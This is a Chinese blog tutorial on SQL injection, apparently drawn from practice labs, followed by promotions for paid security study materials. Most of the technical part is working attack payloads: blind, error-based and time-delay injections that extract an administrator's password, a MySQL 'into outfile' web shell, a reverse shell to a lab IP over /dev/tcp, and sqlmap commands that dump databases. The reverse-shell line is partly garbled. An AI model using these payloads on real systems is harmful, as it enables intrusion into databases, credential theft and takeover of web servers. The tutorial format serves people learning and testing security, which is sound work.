SQL注入一文全解----包括Sqlmap的利用,利用mysql写reverseshell_and 1=cast((select username from users) as int)--(1)

于 2024-04-04 12:28:08 发布
阅读量621 收藏 14
点赞数 28
分类专栏: 2024年程序员学习 文章标签: sql mysql oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84103675/article/details/137372015
版权
  1. 若消失则可以说明 ’ 产生了作用,表明语法错误(在本例中为未闭合的引号)对响应产生了可检测到的影响
  2. 尝试
  3. TrackingId=xyz’||(SELECT ’ ')||’ 其中 ||为字符串拼接 相当于在后面拼接了一个空白,不产生任何作用
  4. 上述发生报错,说明,数据库不支持该格式,修改
  5. TrackingId=xyz’||(SELECT ‘’ FROM dual)||’ dual表是Oracle特有的表 .响应无报错 说明该数据库为Oracle
  6. 这要求所有SELECT语句显式指定表名-----Oracle特有
  7. 在判断完数据库后,验证是否确实存在注入
  8. TrackingId=xyz’||(SELECT ‘’ FROM not-a-real-table)||’ 其中 not-a-real-table是一个不存在的表
  9. 上述出现报错. 此行为强烈表明后端正在将注入作为 SQL 查询进行处理。
  10. 判断表名
  11. TrackingId=xyz’||(SELECT ‘’ FROM users WHERE ROWNUM = 1)||’ 查看users表是否存在
  12. 若没有返回错误,这说明该表确实存在
  13. 其中 rownum函数 相当于 MySQL中的 limit 1 都表示返回一行. 但是在Oracle中没有limit函数。故而采用其他函数进行平替
  14. 添加rownum函数的目的在于防止查询返回多于一行,这会破坏我们的串联。
  15. 测试 case end 该测试条件是否可以响应
  16. TrackingId=xyz’||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM dual)||’ —若响应则应报错
  17. TrackingId=xyz’||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE ‘’ END FROM dual)||’ —修改判断条件,报错消失。表明可以根据特定条件的真实性有条件地触发错误
  18. 判断administrator用户是否存在
  19. TrackingId=xyz’||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ —若存在则报错
  20. 判断密码长度
  21. TrackingId=xyz’||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
  22. burpsuite 判断字符
  23. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,1,1)=‘a’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
  24. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,1,1)=‘§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
  25. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ —修改数值判断…….
  26. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,§2§,1)='§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ ****把两处都添加为变量进行破解
  27. 第一处为1-20 从密码长度得出。
  28. 第二处改为a-z 0-9 A-Z
  • 基于可见错误的盲注手动测试
  1. 判断是否存在注入点
  2. TrackingId=ogAZZfxtOKUELbuJ’ 是否出现错误
  3. TrackingId=ogAZZfxtOKUELbuJ’’ 错误是否消失
  4. 判断TrackingId=ogAZZfxtOKUELbuJ’-- 错误是否消失 这里说明注释起到了作用 —这里出现了报错信息的回显,表明可以利用报错注入
  5. 构造报错语句
  6. ’ AND CAST((SELECT 1) AS int)-- 这里的cast()函数可以修改数据的数据类型
  7. 即: 把 1 转化为整数类型 运行后发现报错([ERROR: argument of AND must be type boolean, not type integer](ERROR: argument of AND must be type boolean, not type integer)) 根据报错可知 and 后面必须是一个布尔型的数据类型
  8. 根据报错进行构造
  9. ’ AND **1=**CAST((SELECT 1) AS int)-- 报错消失,说明构造的语句发挥了作用
  10. ’ AND 1=CAST((SELECT username FROM users) AS int)-- 再次进行构造,尝试获取username —出现报错
  11. 报错信息(Unterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = ‘fOPoniV9hYwm4fZ3’ AND 1=CAST((SELECT username FROM users) AS’. Expected char)
  12. 这说明字符数过于多,尝试删除cookie来空出字符
  13. TrackingId=’ AND 1=CAST((SELECT username FROM users) AS int)-- 报错信息变更,说明更改产生了作用
  14. 报错信息([ERROR: more than one row returned by a subquery used as an expression](ERROR: more than one row returned by a subquery used as an expression)) 这表明返回不仅一行
  15. TrackingId=’ AND 1=CAST((SELECT username FROM users limit 1) AS int)-- —再次进行构造,限制返回行数
  16. 出现错误信息([ERROR: invalid input syntax for type integer: “administrator”](ERROR: invalid input syntax for type integer: “administrator”)) —这返回了第一个用户administrator
  17. 即:泄漏了表中的第一个用户名
  18. 获取密码
  19. ’ AND 1=CAST((SELECT password FROM users limit 1) AS int)-- —构造语句获取密码
  20. 报错信息([ERROR: invalid input syntax for type integer: “q9c7x6xcdn34bcazv2jd”](ERROR: invalid input syntax for type integer: “q9c7x6xcdn34bcazv2jd”))
  • 带有时间延迟和信息检索的盲注手动测试
  1. 判断是否存在时间盲注
  2. trackingId=x’ ; SELECT+CASE+WHEN+(1=1)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END–
  3. 若存在时间盲注则该响应会等待十秒才会响应
  4. TrackingId=x’%3BSELECT+CASE+WHEN+(1=2)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END-- 验证是否是因为语句延迟(排除网络因素)
  5. 判断用户名
  6. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
  7. 延迟存在 , 说明存在administrator用户
  8. 判断密码长度
  9. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’+AND+LENGTH(password)>1)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
  10. 多次测试 最终确定密码长度为20
  11. 密码爆破
  12. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’+AND+SUBSTRING(password,1,1)=‘a’)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
  13. 在bp中添加payload 进行爆破,在列中选择发送到响应 。 时间较长的便是延迟存在的

2. 读内容

  1. 利用 informationschema.tables 来获取 tablename
  2. 利用 informationschema.columns 来获取 columnname
  3. 利用获取的 tablename 和 columnname 来输出内容 尝试获取 登录界面或者ssh的登录密码和用户名

3. 利用sql注入一句话木马

" union select "php-reverse-shell-code one-line" into outfile "/var/www/html/uploads/shell.php"; -- -

这个可以通过获取 传入命令的方式来查看相关文件和信息

也可以生成一个反弹shell

" union select "& /dev/tcp/10.0.2.5/1234 0>&1'\"); ?>","","" into outfile "/var/www/html/uploads/shreverse.php"; -- -

通过nc 进行监听和反弹

4. 通过sqlmap

sql -u "http://10.0.2.7/kzMb5nVYJw/420search.php?usrtosearch=asd" --dbms mysql --dbs

显示出当前都有哪些库

sql -u "http://10.0.2.7/kzMb5nVYJw/420search.php?usrtosearch=asd" --dbms mysql -D 库名 --tables

显示出当前的表名

sql -u "http://10.0.2.7/kzMb5nVYJw/420search.php?usrtosearch=asd" --dbms mysql -D 库名 -T 表名 --columns

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

们一起学习成长!**](https://bbs.csdn.net/forums/4304bb5a486d4c3ab8389e65ecb71ac0)

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

2401_84103675
关注
专栏目录
使用 sqlmap 探测 MySQL 容器
KipJ的博客
10-04 492
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. sqlmap是一个开源的渗透测试工具,它将检测和渗透脆弱数据库并接管数据...
SQL注入常用命令详解
qq_45174221的博客
01-18 2791
当前文章都是对SQL手工注入的讲解,你对手工注入的原理有了一定了解,可以使用sqlmap一把梭,提高注入效率。
sqlmap mysql 登录_sqlmap简单使用
weixin_42523104的博客
01-18 421
1. MySQL数据库注入检查注入点(主要看是否能返回消息):sqlmap.py -u url爆所有库:sqlmap.py -u url -dbs爆当前库:sqlmap.py -u url --current-db2.Access数据库注入判断是否是access数据库:url and exists(select id from MSysAccessObjects)其他数据库判断语句:Access:...
sqlmap使用 mysql_sqlmap使用教程
weixin_39933713的博客
02-11 479
SQLMAP简介sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。1.支持的数据库:MySQL, Oracle,PostgreSQL, Microsoft SQL Server, M...
sqlmap注入mysql_sqlmap注入系列(高级篇)
weixin_42107561的博客
01-30 1005
前言:软件:burpsqlmap软件配置设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置漏洞环境安装数字型注入(post)篇利用burp抓包,将包中的文件另存为33.txt爆出数据库sqlmap -r "/root/22.txt" --dbs爆出表sqlmap -r "22.txt" -D lou --tables爆出表结构sqlmap -r "22.txt" -D lou -T u...
sqlmap_自动化sql注入引擎_None_sqlmap_sql注入_sql_flath1c_vulnerability_
10-02
SQL注入SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
mysql> select user_id,first_name,last_name from dvwa.users where first_name='yangge' or 1=1 limit 2; +---------+------------+-----------+ | user_id | first_name | last_name | +---------+------------+-...
ibatis-sqlmap-2.3.4.741-sources.zip_4 3 2 1_ibatis-sqlm_ibatis-s
09-23
标题 "ibatis-sqlmap-2.3.4.741-sources.zip_4 3 2 1_ibatis-sqlm_ibatis-s" 暗示了这是一个关于iBATIS SQLMap的源码包,版本号为2.3.4.741,可能是一个增强或修改后的版本,具有特定的优化和改进。描述中提到了针对...
10-sql注入-mysql注入1
08-03
- **报错显示**:利用MySQL的错误信息来揭示数据库结构或数据,例如通过`SELECT 1 FROM table WHERE 1=1--`。 - **遗留文件**:寻找并利用可能存在的PHP信息泄漏文件,如`phpinfo()`,来获取系统配置信息。 3. **...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
2. 全面支持:SQLMap支持多种数据库系统,包括MySQL、PostgreSQLOracle、Microsoft SQL Server等。 3. 多种注入技术:它可以执行盲注、时间延迟注入、基于错误的注入等多种类型的SQL注入攻击。 4. 数据库接管:...
sqlmap使用 mysql_sqlmap基本使用
weixin_35693055的博客
02-05 451
介绍:sqlmap是一个自动化的sql注入工具,其主要功能是扫描,发现并利用给定的URL进行sql注入,目前支持数据库有mysqloracle、access、postagesqlsql server、sqlite等sqlmap采用了五种独特的sql注入技术:布尔类型的盲注,既可以根据返回页面判断条件真假的注入时间的盲注,既不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已经...
mysql sqlmap_[转载]sqlmap实例注入mysql
weixin_33622032的博客
01-18 145
D:Python27sqlmap>sqlmap.py-u http://www.wepost.com.hk/article.php?id=276--dbms "Mysql"--current-user/*注解:获取当前用户名称sqlmap/0.9 - automatic SQL injection and database takeovertool[*] starting at: 16:5...
sqlmap运行mysql命令_sqlmap命令总结
weixin_32491317的博客
01-30 553
Sqlmap常规命令:sqlmap -u "http://www.xxx.com/shownews.asp?id=1" –-tables (获取表)sqlmap-u "http://www.xxx.com/shownews.asp?id=1" –-columns -T 表 (获取指定表字段内容)sqlmap-u "http://www.xxx.com/shownews.asp?id=1" –-du...
sqlmap运行mysql命令_Sqlmap常见命令
weixin_29193259的博客
01-21 639
Sqlmap常见命令借着复习mysql的机会再重新复习一下sqlmap,因为参数太多了,我只记录一下自己常用的命令,如果想看详细大全,可以看一下大佬们的完整版文章参考想了解sql注入流程的可以看一下1.选项-h,--help 显示基本帮助信息并退出-hh 显示高级帮助信息并退出--version 显示程序版本信息并退出2.目标在这些选项中必须提供至少有一个确定目标-u 目标URL例:sql...
漏洞原理MySql注入 Windows中Sqlmap 工具的使用
qq_56248592的博客
01-28 868
漏洞利用:如果SQLmap检测到目标存在SQL注入漏洞,可以利用该漏洞执行各种操作,如获取数据库信息、执行系统命令、上传文件等。测试目标:使用SQLmap对目标进行测试,工具会检测是否存在SQL注入漏洞。6. 获取指定库指定表指定字段的值 # python sqlmap.py -u url -D 数据库名 -T 表名 -C 字段名1,字段名2... --dump。5. 获取当前数据库指定的表的字段名 # python sqlmap.py -u url -D 数据库名 -T 表名 --columns。
sqlmap运行mysql命令_注入神器sqlmap使用详解
weixin_29018815的博客
02-11 662
说明本文主要讲一下sqlmap在实战中的一些技巧注入检测检测注入sqlmap.py -u http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 --batch参数“–batch”命令来自动答复y或n。批量检测sqlmap.py-m url.txt常用注入方法1.ACCESS数据库注入:sqlmap.py -u “url” /*-u为常规扫描参数*...
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
全村的希望
11-25 1296
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
SQLMAP】零基础教程,零基础入门到精通,一篇就够了
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-01 1381
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
超详细SQLMap使用攻略及技巧分享
白昼小丑的博客
03-28 1091
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站:http://sqlmap.org/, 下载地址:https://github.com/sqlmapproject/sqlmap/zipball/master 演示视
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值